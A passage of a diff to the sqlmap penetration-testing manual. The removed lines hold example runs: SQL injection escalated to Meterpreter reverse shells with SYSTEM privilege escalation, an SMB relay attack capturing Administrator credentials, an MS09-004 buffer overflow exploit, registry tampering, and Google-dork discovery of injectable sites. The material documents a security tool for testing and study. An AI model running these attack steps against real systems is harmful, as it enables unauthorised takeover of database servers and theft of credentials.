to connect back from the database host to this machine, on all ports -between the specified and 65535 -[3] Bind TCP: Listen on the database host for a connection -> 1 -which is the local address? [192.168.136.1] -which local port number do you want to use? [44780] -[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload -that can be used to escalate privileges, either via 'incognito' extension or via -'getsystem' command -which payload encoding do you want to use? -[1] No Encoder -[2] Alpha2 Alphanumeric Mixedcase Encoder -[3] Alpha2 Alphanumeric Uppercase Encoder -[4] Avoid UTF8/tolower -[5] Call+4 Dword XOR Encoder -[6] Single-byte XOR Countdown Encoder -[7] Variable-length Fnstenv/mov Dword XOR Encoder -[8] Polymorphic Jump/Call XOR Additive Feedback Encoder -[9] Non-Alpha Encoder -[10] Non-Upper Encoder -[11] Polymorphic XOR Additive Feedback Encoder (default) -[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder -[13] Alpha2 Alphanumeric Unicode Uppercase Encoder -> -[hh:mm:53] [INFO] creation in progress ..... done -[hh:mm:58] [INFO] compression in progress . done -[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe' -[hh:mm:05] [INFO] running Metasploit Framework 3 command line interface locally, wait.. -[*] Please wait while we load the module tree... -[*] Started reverse handler on 192.168.136.1:44780 -[*] Starting the payload handler... -[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. -[*] Sending stage (748032 bytes) -[*] Meterpreter session 1 opened (192.168.136.1:44780 -> 192.168.136.128:2185) - -meterpreter > -[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which -tries different techniques, including kitrap0d -[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you -want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not -success to elevate privileges -Loading extension espia...success. -meterpreter > Loading extension incognito...success. -meterpreter > Loading extension priv...success. -meterpreter > Loading extension sniffer...success. -meterpreter > Computer: W2K3DEV -OS : Windows .NET Server (Build 3790, Service Pack 2). -Arch : x86 -Language: en_US -meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE -meterpreter > ...got system (via technique 4). -meterpreter > -Delegation Tokens Available -======================================== -NT AUTHORITY\LOCAL SERVICE -NT AUTHORITY\NETWORK SERVICE -NT AUTHORITY\SYSTEM -W2K3DEV\Administrator -W2K3DEV\IUSR_W2K3STENSP0 -W2K3DEV\postgres - -Impersonation Tokens Available -======================================== -NT AUTHORITY\ANONYMOUS LOGON - -meterpreter > Server username: NT AUTHORITY\SYSTEM -meterpreter > ipconfig - -MS TCP Loopback interface -Hardware MAC: 00:00:00:00:00:00 -IP Address : 127.0.0.1 -Netmask : 255.0.0.0 - - - -VMware Accelerated AMD PCNet Adapter #2 -Hardware MAC: 00:0c:29:86:69:1b -IP Address : 192.168.136.128 -Netmask : 255.255.255.0 - - -meterpreter > getuid -Server username: NT AUTHORITY\SYSTEM -meterpreter > exit - -[hh:mm:52] [INFO] cleaning up the database management system - - - -One click prompt for an out-of-band shell, meterpreter or VNC - -

    -Switches: --os-smbrelay, --priv-esc and --msf-path - -

    -If the back-end database management system runs on Windows as -Administrator and the system is not patched against Microsoft -Security Bulletin , sqlmap can abuse the universal naming convention (UNC) -feature within any database management system to force the database server -to initiate a SMB connection with the attacker host, then perform a SMB -authentication relay attack in order to establish a high-privileged -out-of-band TCP stateful channel between the attacker host and -the target database server. -sqlmap relies on 's SMB relay exploit to perform this attack. -You need to run sqlmap as a privileged user (e.g. root) if you -want to perform a SMB relay attack because it will need to listen on a -user-specified SMB TCP port for incoming connection attempts. - -

    -Note that this feature is not supported by sqlmap running on Windows -platform because it relies on Metasploit's msfpayload which is -not fully working on Windows. - -

    -This technique is detailed in the white paper -. - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 running as -Administrator on the target: - - -$ sudo python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \ - --os-smbrelay -v 1 --msf-path /home/inquis/software/metasploit - -[...] -[hh:mm:11] [INFO] the back-end DBMS is Microsoft SQL Server -web server operating system: Windows 2000 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:11] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:16] [INFO] the web application supports stacked queries on parameter 'name' -[hh:mm:16] [WARNING] it is unlikely that this attack will be successful because often -Microsoft SQL Server 2005 runs as Network Service which is not a real user, it does not -send the NTLM session hash when connecting to a SMB service -[hh:mm:16] [INFO] which connection type do you want to use? -[1] Bind TCP (default) -[2] Bind TCP (No NX) -[3] Reverse TCP -[4] Reverse TCP (No NX) -> 1 -[hh:mm:16] [INFO] which is the local address? [192.168.136.161] 192.168.136.161 -[hh:mm:16] [INFO] which is the back-end DBMS address? [192.168.136.131] 192.168.136.131 -[hh:mm:16] [INFO] which remote port numer do you want to use? [4907] 4907 -[hh:mm:16] [INFO] which payload do you want to use? -[1] Meterpreter (default) -[2] Shell -[3] VNC -> 1 -[hh:mm:16] [INFO] which SMB port do you want to use? -[1] 139/TCP (default) -[2] 445/TCP -> 1 -[hh:mm:16] [INFO] running Metasploit Framework 3 console locally, wait.. - - _ _ _ _ - | | | | (_) | - _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ -| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| -| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ -|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| - | | - |_| - - - =[ msf v3.3-dev -+ -- --=[ 392 exploits - 234 payloads -+ -- --=[ 20 encoders - 7 nops - =[ 168 aux - -resource> use windows/smb/smb_relay -resource> set SRVHOST 192.168.136.161 -SRVHOST => 192.168.136.161 -resource> set SRVPORT 139 -SRVPORT => 139 -resource> set PAYLOAD windows/meterpreter/bind_tcp -PAYLOAD => windows/meterpreter/bind_tcp -resource> set LPORT 4907 -LPORT => 4907 -resource> set RHOST 192.168.136.131 -RHOST => 192.168.136.131 -resource> exploit -[*] Exploit running as background job. -msf exploit(smb_relay) > -[*] Started bind handler -[*] Server started. -[*] Received 192.168.136.131:3242 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 -Service Pack 2 LM: -[*] Sending Access Denied to 192.168.136.131:3242 \ -[*] Received 192.168.136.131:3242 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows -Server 2003 3790 Service Pack 2 LM: -[*] Authenticating to 192.168.136.131 as W2K3DEV\Administrator... -[*] AUTHENTICATED as W2K3DEV\Administrator... -[*] Connecting to the ADMIN$ share... -[*] Regenerating the payload... -[*] Uploading payload... -[*] Created \wELRmcmd.exe... -[*] Connecting to the Service Control Manager... -[*] Obtaining a service manager handle... -[*] Creating a new service... -[*] Closing service handle... -[*] Opening service... -[*] Starting the service... -[*] Removing the service... -[*] Closing service handle... -[*] Deleting \wELRmcmd.exe... -[*] Sending Access Denied to 192.168.136.131:3242 W2K3DEV\Administrator -[*] Transmitting intermediate stager for over-sized stage...(216 bytes) -[*] Received 192.168.136.131:3244 \ LMHASH:00 NTHASH: OS:Windows Server 2003 3790 -Service Pack 2 LM: -[*] Sending Access Denied to 192.168.136.131:3244 \ -[*] Received 192.168.136.131:3244 W2K3DEV\Administrator LMHASH:FOO NTHASH:BAR OS:Windows -Server 2003 3790 Service Pack 2 LM: -[*] Authenticating to 192.168.136.131 as W2K3DEV\Administrator... -[*] AUTHENTICATED as W2K3DEV\Administrator... -[*] Ignoring request from 192.168.136.131, attack already in progress. -[*] Sending Access Denied to 192.168.136.131:3244 W2K3DEV\Administrator -[*] Sending stage (718336 bytes) -[*] Meterpreter session 1 opened (192.168.136.161:51813 -> 192.168.136.131:4907) - -Active sessions -=============== - - Id Description Tunnel - -- ----------- ------ - 1 Meterpreter 192.168.136.161:51813 -> 192.168.136.131:4907 - -msf exploit(smb_relay) > [*] Starting interaction with 1... - -meterpreter > [-] The 'priv' extension has already been loaded. -meterpreter > getuid -Server username: NT AUTHORITY\SYSTEM -meterpreter > exit - -[*] Meterpreter session 1 closed. -msf exploit(smb_relay) > exit - -[*] Server stopped. - - - -Database stored procedure heap-based buffer overflow exploit - -

    -Switches: --os-bof, --priv-esc and --msf-path - -

    -If the back-end database management system is Microsoft SQL Server not -patched against Microsoft Security Bulletin -, sqlmap can exploit the heap-based buffer overflow -affecting sp_replwritetovarbin stored procedure in order to -establish an out-of-band TCP stateful channel between the -attacker host and the target database server. -sqlmap has its own exploit to trigger the vulnerability, but it relies on - to -generate the shellcode used within the exploit. - -

    -Note that this feature is not supported by sqlmap running on Windows -platform because it relies on Metasploit's msfcli which is not -available for Windows. - -

    -This technique is detailed in the white paper - and in the -slide deck . - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u http://192.168.136.128/sqlmap/mssql/iis/get_int.asp?id=1 \ - --os-bof -v 1 --msf-path ~/software/metasploit - -[...] -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:51] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:56] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:56] [INFO] going to exploit the Microsoft SQL Server 2005 'sp_replwritetovarbin' -stored procedure heap-based buffer overflow (MS09-004) -[hh:mm:56] [INFO] fingerprinting the back-end DBMS operating system version and service pack -[hh:mm:56] [INFO] retrieved: 1 -[hh:mm:58] [INFO] retrieved: 1 -[hh:mm:58] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 2 -[hh:mm:58] [INFO] creating Metasploit Framework 3 multi-stage shellcode -which connection type do you want to use? -[1] Reverse TCP: Connect back from the database host to this machine (default) -[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports -between the specified and 65535 -[3] Bind TCP: Listen on the database host for a connection -> -which is the local address? [192.168.136.1] -which local port number do you want to use? [21380] -which payload do you want to use? -[1] Meterpreter (default) -[2] Shell -[3] VNC -> -which payload encoding do you want to use? -[1] No Encoder -[2] Alpha2 Alphanumeric Mixedcase Encoder -[3] Alpha2 Alphanumeric Uppercase Encoder -[4] Avoid UTF8/tolower -[5] Call+4 Dword XOR Encoder -[6] Single-byte XOR Countdown Encoder -[7] Variable-length Fnstenv/mov Dword XOR Encoder -[8] Polymorphic Jump/Call XOR Additive Feedback Encoder -[9] Non-Alpha Encoder -[10] Non-Upper Encoder -[11] Polymorphic XOR Additive Feedback Encoder (default) -[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder -[13] Alpha2 Alphanumeric Unicode Uppercase Encoder -> -[hh:mm:16] [INFO] creation in progress .... done -[hh:mm:20] [INFO] running Metasploit Framework 3 command line interface locally, wait.. -[*] Please wait while we load the module tree... -[*] Started reverse handler on 192.168.136.1:21380 -[*] Starting the payload handler... -[hh:mm:27] [INFO] triggering the buffer overflow vulnerability, wait.. -[*] Sending stage (748032 bytes) -[*] Meterpreter session 1 opened (192.168.136.1:21380 -> 192.168.136.128:12062) - -meterpreter > Loading extension espia...success. -meterpreter > Loading extension incognito...success. -meterpreter > Loading extension priv...success. -meterpreter > Loading extension sniffer...success. -meterpreter > Computer: W2K3DEV -OS : Windows .NET Server (Build 3790, Service Pack 2). -Arch : x86 -Language: en_US -meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE -meterpreter > ipconfig - -MS TCP Loopback interface -Hardware MAC: 00:00:00:00:00:00 -IP Address : 127.0.0.1 -Netmask : 255.0.0.0 - - - -VMware Accelerated AMD PCNet Adapter #2 -Hardware MAC: 00:0c:29:86:69:1b -IP Address : 192.168.136.128 -Netmask : 255.255.255.0 - - -meterpreter > exit - +name="MS10-015">). Windows registry access

    -It is possible to access Windows registry when the back-end -database management system is either MySQL, PostgreSQL or -Microsoft SQL Server, and when the underlying database layer -supports stacked SQL queries. Also, session user has to have -the needed privileges to access it. +It is possible to access Windows registry when the back-end database +management system is either MySQL, PostgreSQL or Microsoft SQL Server, +and when the web application supports stacked queries. Also, session user +has to have the needed privileges to access it. Read a Windows registry key value @@ -4996,41 +2587,6 @@ Switch: --reg-read

    Using this option you can read registry key values. -

    -Example on a PostgreSQL 8.4 target: - - -$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-read - -[...] -web server operating system: Windows -web application technology: PHP 5.3.1, Apache 2.2.14 -back-end DBMS: PostgreSQL - -[hh:mm:15] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:15] [INFO] detecting back-end DBMS version from its banner -[hh:mm:15] [INFO] retrieved: 8.4.2, -[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:23] [INFO] retrieved: 1 -[hh:mm:23] [INFO] the back-end DBMS operating system is Windows -[hh:mm:23] [INFO] testing if current user is DBA -[hh:mm:23] [INFO] retrieved: 1 -[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist -[hh:mm:23] [INFO] retrieved: 0 -[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist -[hh:mm:24] [INFO] retrieved: 0 -[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file -[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file -which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ -CurrentVersion] -which registry key value do you want to read? [ProductName] -[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ -Windows NT\CurrentVersion\ProductName' -[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP -Registry key value data: 'ProductName REG_SZ Microsoft Windows XP' - - Write a Windows registry key value

    @@ -5039,38 +2595,6 @@ Switch: --reg-add

    Using this option you can write registry key values. -

    -Example on a PostgreSQL 8.4 target: - - -$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-add - -[...] -web server operating system: Windows -web application technology: PHP 5.3.1, Apache 2.2.14 -back-end DBMS: PostgreSQL - -[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:20] [INFO] detecting back-end DBMS version from its banner -[hh:mm:20] [INFO] retrieved: 8.4.2, -[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:29] [INFO] retrieved: 1 -[hh:mm:30] [INFO] the back-end DBMS operating system is Windows -[hh:mm:30] [INFO] testing if current user is DBA -[hh:mm:30] [INFO] retrieved: 1 -[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist -[hh:mm:30] [INFO] retrieved: 0 -[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file -which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap -which registry key value do you want to write? Test -which registry key value data do you want to write? 1 -which registry key value data-type is it? [REG_SZ] REG_DWORD -[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test' -with data '1'. This will work only if the user running the database process has privileges -to modify the Windows registry. - - Delete a Windows registry key

    @@ -5079,43 +2603,10 @@ Switch: --reg-del

    Using this option you can delete registry keys. -

    -Example on a PostgreSQL 8.4 target: - - -$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-del - -[...] -web server operating system: Windows -web application technology: PHP 5.3.1, Apache 2.2.14 -back-end DBMS: PostgreSQL - -[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:20] [INFO] detecting back-end DBMS version from its banner -[hh:mm:20] [INFO] retrieved: 8.4.2, -[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:29] [INFO] retrieved: 1 -[hh:mm:30] [INFO] the back-end DBMS operating system is Windows -[hh:mm:30] [INFO] testing if current user is DBA -[hh:mm:30] [INFO] retrieved: 1 -[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist -[hh:mm:30] [INFO] retrieved: 0 -[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file -which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap -which registry key value do you want to delete? Test -are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\ -sqlmap\Test? [y/N] y -[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. -This will work only if the user running the database process has privileges to modify the -Windows registry. - - - Auxiliary registry switches

    -Switches: --reg-key, --reg-value, +Switches: --reg-key, --reg-value, --reg-data and --reg-type

    @@ -5126,80 +2617,52 @@ information when asked, you can use them at command prompt as program arguments.

    -With --reg-key option you specify used windows -registry key path, with --reg-value value item -name inside provided key, with --reg-data value -data, while with --reg-type option you specify -type of the value item. +With --reg-key option you specify used Windows registry +key path, with --reg-value value item name inside +provided key, with --reg-data value data, while with +--reg-type option you specify type of the value item.

    -So, another way of running example from option ---reg-add could be: +A sample command line for adding a registry key hive follows: -$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \ - --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1 +$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \ + --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1 -Miscellaneous -Session file: save and resume all data retrieved +General + + +TODO + +

    +Switch: -t + +

    +TODO + + +Session file: save and resume data retrieved

    Switch: -s

    -By default sqlmap logs all queries and their output into a text file while -performing whatever request, both in blind SQL injection and in inband SQL -injection. -This is useful if you stop the injection and resume it after some time. +By default sqlmap logs all queries and their output into a textual file +called session file, regardless of the technique used to extract +the data. +This is useful if you stop the injection for any reason and rerun it +afterwards: sqlmap will parse the session file and resume enumerated data +from it, then carry on extracting data from the exact point where it left +before you stopped the tool.

    -The default session file is output/hostname/session, but you can -change its path with the -s option. +The default session file is output/TARGET_URL/session, but you +can specify a different file path with -s switch.

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \ - -v 2 -s "sqlmap.log" - -[...] -back-end DBMS: PostgreSQL -[hh:mm:02] [DEBUG] query: VERSION() -[hh:mm:02] [INFO] retrieved: PostgreSQL 8.3.5 on i486-pc-^C -[hh:mm:03] [ERROR] user aborted - - -

    -As you can see, I stopped the injection with CTRL-C while -retrieving the PostgreSQL banner and logged the session to text file -sqlmap.log. - - -$ cat sqlmap.log - -[hh:mm:00 MM/DD/YY] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection point][GET] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection parameter][id] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Injection type][numeric] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][Parenthesis][0] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][CONCAT('9', '9')][] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH(SYSDATE)][] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][COALESCE(3, NULL)][3] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][LENGTH('3')][1] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][DBMS][PostgreSQL] -[http://192.168.136.131/sqlmap/pgsql/get_int.php][GET][id=1][VERSION()][PostgreSQL 8.3.5 -on i486-pc- - - -

    -As you can see, all queries performed and their output have been logged to -the session file in real time while performing the injection. - -

    -The session file has a structure as follows: +The session file has the following structure: [hh:mm:ss MM/DD/YY] @@ -5207,55 +2670,22 @@ The session file has a structure as follows:

    -Performing the same request now, sqlmap resumes all information already -retrieved then calculates the query length, in the example -VERSION(), and resumes the injection from the last character -retrieved to the end of the query output. - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \ - -v 2 -s "sqlmap.log" - -[...] -[hh:mm:03] [INFO] resuming injection point 'GET' from session file -[hh:mm:03] [INFO] resuming injection parameter 'id' from session file -[hh:mm:03] [INFO] resuming injection type 'numeric' from session file -[hh:mm:03] [INFO] resuming 0 number of parenthesis from session file -[hh:mm:03] [INFO] resuming back-end DBMS 'PostgreSQL' from session file -[hh:mm:03] [INFO] testing connection to the target url -[hh:mm:03] [INFO] testing for parenthesis on injectable parameter -[hh:mm:03] [INFO] retrieving the length of query output -[hh:mm:03] [DEBUG] query: LENGTH(VERSION()) -[hh:mm:03] [INFO] retrieved: 98 -[hh:mm:03] [INFO] resumed from file 'sqlmap.log': PostgreSQL 8.3.5 on i486-pc-... -[hh:mm:03] [INFO] retrieving pending 70 query output characters -[hh:mm:03] [DEBUG] query: SUBSTR((VERSION())::text, 29, 98) -[hh:mm:03] [INFO] retrieved: linux-gnu, compiled by GCC gcc-4.3.real -(Ubuntu 4.3.2-1ubuntu11) 4.3.2 -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex) -back-end DBMS: PostgreSQL - -[hh:mm:07] [INFO] fetching banner -banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real -(Ubuntu 4.3.2-1ubuntu11) 4.3.2' - +A more user friendly textual file where all data retrieved is saved, is +the log file, output/TARGET_URL/log. This file can be +useful to see all information enumerated to the end. -Flush session file for current target +Flush session file

    Switch: --flush-session

    As you are already familiar with the concept of a session file from the -description of option -s, it is good to know that you can flush -the content of that same file using option --flush-session. -This way you can avoid caching mechanisms implemented by default in -sqlmap. Other possible way is the manual removing of session file(s), -sqlmap.log in the example above, or the default -output/hostname/session if -s is not provided. +description above, it is good to know that you can flush the content of +that file using option --flush-session. +This way you can avoid the caching mechanisms implemented by default in +sqlmap. Other possible way is to manually remove the session file(s). Estimated time of arrival @@ -5264,109 +2694,41 @@ sqlmap. Other possible way is the manual removing of session file(s), Switch: --eta

    -It is possible to calculate and show the estimated time of arrival to -retrieve each query output in real time while performing the SQL injection -attack. +It is possible to calculate and show in real time the estimated time of +arrival to retrieve each query output. This is shown when the technique +used to retrieve the output is any of the blind SQL injection types.

    -Example on an Oracle XE 10.2.0.1 target: +Example against an Oracle target affected only by boolean-based blind SQL +injection: -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -b \ - --eta -v 2 +$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta [...] -back-end DBMS: Oracle - -[hh:mm:24] [INFO] fetching banner -[hh:mm:24] [INFO] the resumed output is partial, sqlmap is going to retrieve the query -output again -[hh:mm:24] [INFO] retrieved the length of query output: 64 -[hh:mm:24] [DEBUG] query: SELECT NVL(CAST(banner AS VARCHAR(4000)), (CHR(32))) FROM v$version -WHERE ROWNUM=1 -77% [=======================================> ] 49/64 ETA 00:00 +[hh:mm:01] [INFO] the back-end DBMS is Oracle +[hh:mm:01] [INFO] fetching banner +[hh:mm:01] [INFO] retrieving the length of query output +[hh:mm:01] [INFO] retrieved: 64 +17% [========> ] 11/64 ETA 00:19

    -then: +Then: -100% [====================================================] 64/64 -[hh:mm:15] [DEBUG] performed 454 queries in 2 seconds -banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product' - +100% [===================================================] 64/64 +[10:28:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod -

    -Example on a Microsoft SQL Server 2000 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" \ - --users --eta -v 1 - -[...] -back-end DBMS: Microsoft SQL Server 2000 - -[hh:mm:57] [INFO] fetching database users -[hh:mm:57] [INFO] fetching number of database users -[hh:mm:57] [INFO] retrieved: 3 -[hh:mm:57] [INFO] retrieved the length of query output: 22 -100% [====================================================] 22/22 -[hh:mm:58] [INFO] retrieved the length of query output: 2 -100% [====================================================] 2/2 -[hh:mm:59] [INFO] retrieved the length of query output: 25 -100% [====================================================] 25/25 -[hh:mm:00] [DEBUG] performed 181 queries in 1 seconds -database management system users [3]: -[*] BUILTIN\Administrators -[*] sa -[*] W2KITINQUIS\Administrator +web application technology: PHP 5.2.6, Apache 2.2.9 +back-end DBMS: Oracle +banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

    As you can see, sqlmap first calculates the length of the query output, then estimates the time of arrival, shows the progress in percentage and -counts the number of retrieved query output characters. - - -Use Google dork results from specified page number - -

    -Switch: --gpage - -

    -Default sqlmap behavior with option -g is to do a Google -search and use resulting urls from first (100) result page for further -sql injection testing. In combination with this option you can specify -some other page other than the first one for retrieving target urls. - -

    -Example of Google dorking with expression login ext:php -and resulting page set to 3: - - -$ python sqlmap.py -g "ext:php login" --gpage 3 -v 1 - -[hh:mm:14] [INFO] first request to Google to get the session cookie -[hh:mm:14] [INFO] using Google result page #3 -[hh:mm:14] [INFO] sqlmap got 100 results for your Google dork expression, 89 of them are -testable targets -[hh:mm:15] [INFO] sqlmap got a total of 89 targets -url 1: -GET http://www.XXX.com/index.php?pageid=login -do you want to test this url? [Y/n/q] -> y -[hh:mm:17] [INFO] testing url http://www.XXX.com/index.php?pageid=login -[hh:mm:17] [INFO] using '/home/inquis/sqlmap/output/www.XXX.com/session' as session file -[hh:mm:17] [INFO] testing connection to the target url -[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds -[hh:mm:19] [INFO] url is stable -[hh:mm:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic -[hh:mm:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic -[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic -[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic -[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic -[...] - +counts the number of retrieved output characters. Update sqlmap @@ -5375,27 +2737,17 @@ do you want to test this url? [Y/n/q] Switch: --update

    -Using this option you can update the program to the latest version -directly from the Subversion repository along with the latest -Microsoft SQL Server XML versions file from Chip Andrews' -. - - -$ python sqlmap.py --update - -[...] -[hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository -[hh:mm:28] [INFO] updated to the latest revision XXXX -[hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file -[hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update -[...] - +Using this option you can update the tool to the latest development +version directly from the subversion repository. You obviously need +Internet access.

    -The Debian and Red Hat installation packages (deb and rpm) as well as the -Windows binary package (exe) can not be used to update sqlmap. You need -a source package (gzip, bzip2 or zip) to use this feature. +If, for any reason, this operation fails, try with a manual svn +update from your sqlmap working copy. It will perform the exact same +operation of switch --update. +If you are running sqlmap on Windows, you can use the TartoiseSVN client +by right-clicking in Windows Explorer into your local sqlmap working copy +and Update. Save options in a configuration INI file @@ -5406,153 +2758,8 @@ Switch: --save

    It is possible to save the command line options to a configuration INI file. - -

    -Example on a PostgreSQL 8.3.5 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b \ - -v 1 --save - -[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' -configuration file -[hh:mm:33] [INFO] testing connection to the target url -[hh:mm:33] [INFO] testing if the url is stable, wait a few seconds -[...] - - -

    -As you can see, sqlmap saved the command line options to a configuration -INI file, sqlmap-SAUbs.conf. - - -$ cat sqlmap-SAUbs.conf -[Target] -url = http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1 -googledork = -configfile = -list = -requestfile = - -[Windows] -regread = False -regval = -regdata = -regadd = False -regdel = False -regtype = -regkey = - -[User-defined function] -shlib = -udfinject = False - -[Request] -cookieurlencode = False -ignoreproxy = False -threads = 1 -acert = -retries = 3 -useragentsfile = -atype = -agent = -delay = 0 -headers = -cookie = -proxy = -timeout = 30 -scope = -acred = -referer = -dropsetcookie = False -data = -method = GET - -[Miscellaneous] -updateall = False -sessionfile = -eta = False -batch = False -flushsession = False -cleanup = False -googlepage = 0 -verbose = 1 - -[Enumeration] -limitstop = 0 -getpasswordhashes = False -excludesysdbs = False -getcurrentdb = False -getcurrentuser = False -limitstart = 0 -query = -getusers = False -isdba = False -gettables = False -dumptable = False -getdbs = False -db = -sqlshell = False -tbl = -firstchar = 0 -getcolumns = False -getbanner = True -dumpall = False -getprivileges = False -lastchar = 0 -col = -user = - -[File system] -dfile = -wfile = -rfile = - -[Takeover] -msfpath = -osshell = False -ossmb = False -privesc = False -ospwn = False -tmppath = -oscmd = -osbof = False - -[Fingerprint] -extensivefp = False - -[Injection] -dbms = -string = -postfix = -regexp = -prefix = -testparameter = -estring = -eregexp = -os = - -[Techniques] -utech = -unionuse = False -timetest = False -uniontest = False -stackedtest = False -timesec = 5 - - -

    -The file is a valid sqlmap configuration INI file. -You can edit the configuration options as you wish and pass it to sqlmap -with the -c option as explained above in section 5.2.5: - - -$ python sqlmap.py -c sqlmap-SAUbs.conf - -[...] -banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real -(Ubuntu 4.3.2-1ubuntu11) 4.3.2' - +The generated file can then be edited and passed to sqlmap with the +-c option as explained above. Act in non-interactive mode @@ -5562,50 +2769,32 @@ Switch: --batch

